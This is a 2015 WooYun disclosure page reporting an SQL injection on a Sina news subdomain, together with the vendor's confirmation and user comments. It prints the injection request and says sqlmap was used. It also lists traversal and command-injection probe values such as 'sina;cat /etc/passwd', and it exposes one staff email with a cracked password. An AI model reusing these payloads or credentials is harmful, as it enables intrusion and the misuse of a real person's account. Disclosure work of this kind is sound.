当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-090133

漏洞标题:新浪新闻某站可被脱裤(可导致管理和部分职工内部邮箱、账号、明文密码泄露,也可能导致被挂马)

相关厂商:新浪

漏洞作者: 枪花

提交时间:2015-01-05 21:16

修复时间:2015-02-19 21:18

公开时间:2015-02-19 21:18

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-05: 细节已通知厂商并且等待厂商处理中
2015-01-06: 厂商已经确认,细节仅向厂商公开
2015-01-16: 细节向核心白帽子及相关领域专家公开
2015-01-26: 细节向普通白帽子公开
2015-02-05: 细节向实习白帽子公开
2015-02-19: 细节向公众公开

简要描述:

新年新气象

详细说明:

发送数据包
GET /s/?cate=12345%bf'&date=day HTTP/1.1
Referer: 123
Host: roll.sky.news.sina.com.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36
Accept: */*
报错,应该存在注入

漏洞证明:

构造语句 查询下当前用户

1.jpg


既然存在注入,丢到SQLMAP跑一下看看

2.jpg


查询一下存在表admin

4.jpg


里面有50个内部职工内部邮箱 账号 加密后的密码等信息
这里只为了证明 截取部分如图:

2.png


同时这些加密的密码完全可以被解密
解密后的内容如图:

3.png


这里为了和谐 都马赛克了
为了证明给出一个账号的密码
内部邮箱 jiqiang@staff.sina.com.cn 账号 jiqiang
加密后的密码e10adc3949ba59abbe56e057f20f883e 明文密码 123456
仅此证明 事后请修改一下
数据库里有些脏数据 请检查
weibo_collect表里有些垃圾数据:
2232 1293425934 ../../../../../../../../../../../etc/passwd
2233 1293425934 ../../../../../../../../../../../etc/passwd\x00
2234 1293425934 ../../../../../../../../../../../../../etc/passwd\x00
2235 1293425934 http://10.210.128.59/test.txt?
2236 1293425934 file:///etc/passwd
2237 1293425934 file:///etc/passwd\x00
2238 1293425934 sina|cat /etc/passwd
2239 1293425934 sina;cat /etc/passwd
另外xj_news表里存放的是新闻的链接地址
如果替换这些链接地址 可以导致被挂马 这里列出一部分内容

id	pid	pub_id	url	col2	col1
1 6 6_1807 http://news.sina.com.cn/c/2010-01-10/201919438573.shtml 鍚勫湴鏂伴椈 鍥藉唴鏂伴椈
2 9 9_1217 http://finance.sina.com.cn/stock/jsy/20100110/20237220389.shtml 鑲″競鍙婃椂闆?璇佸埜 1
3 6 6_1808 http://news.sina.com.cn/c/2010-01-10/202519438580.shtml 鍚勫湴鏂伴椈 鍥藉唴鏂伴椈
4 6 6_1809 http://news.sina.com.cn/w/2010-01-10/202419438584.shtml 鏈€鏂版秷鎭?鍥介檯鏂伴椈 1
5 6 6_1810 http://news.sina.com.cn/w/2010-01-10/202319438585.shtml 鏈€鏂版秷鎭?鍥介檯鏂伴椈 1
6 6 6_1568_v http://video.sina.com.cn/news/c/v/2010-01-10/184151873.shtml 瑙嗛鏂伴椈 绀句細鏂伴椈
7 6 6_1811 http://news.sina.com.cn/c/2010-01-10/202419438586.shtml 鍚勫湴鏂伴椈 鍥藉唴鏂伴椈
8 9 9_1218 http://finance.sina.com.cn/g/20100110/19397220373.shtml 鍥藉唴璐㈢粡 鍥藉唴璐㈢粡
9 6 6_1569_v http://video.sina.com.cn/news/c/v/2010-01-10/203351875.shtml 瑙嗛鏂伴椈 鍥藉唴鏂伴椈
10 9 9_1219 http://finance.sina.com.cn/stock/hyyj/20100110/11307219942.shtml 琛屼笟鐮旂┒ 璇佸埜


没有做进一步测试!仅作为风险提醒。

修复方案:

做好过滤 防止SQL注入
另外加强职工安全教育 设置更为复杂的密码

版权声明:转载请注明来源 枪花@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:7

确认时间:2015-01-06 09:48

厂商回复:

老旧系统,已经准备下线,感谢对新浪安全的支持

最新状态:

暂无


漏洞评价:

评论

  1. 2015-01-05 21:18 | 泳少 ( 普通白帽子 | Rank:231 漏洞数:79 | ★ 梦想这条路踏上了,跪着也要...)

    前排围观某浪@孤独雪狼 来看看

  2. 2015-01-05 21:26 | Gzsa ( 路人 | Rank:2 漏洞数:2 )

    明文密码。

  3. 2015-01-05 21:26 | 枪花 ( 实习白帽子 | Rank:50 漏洞数:11 | 黑夜独行)

    @疯狗 求个精华好吗?

  4. 2015-01-06 10:23 | 枪花 ( 实习白帽子 | Rank:50 漏洞数:11 | 黑夜独行)

    @新浪 及时下线吧,貌似其他旧系统还有漏洞啊 先不提交了过段时间如果没下线我再发哈

  5. 2015-01-06 11:29 | 孤独雪狼 ( 普通白帽子 | Rank:710 漏洞数:145 | 七夕手机被偷,这坑爹的七夕啊 。。。。)

    @泳少 这有啥好围观的 渣浪mysql都好几个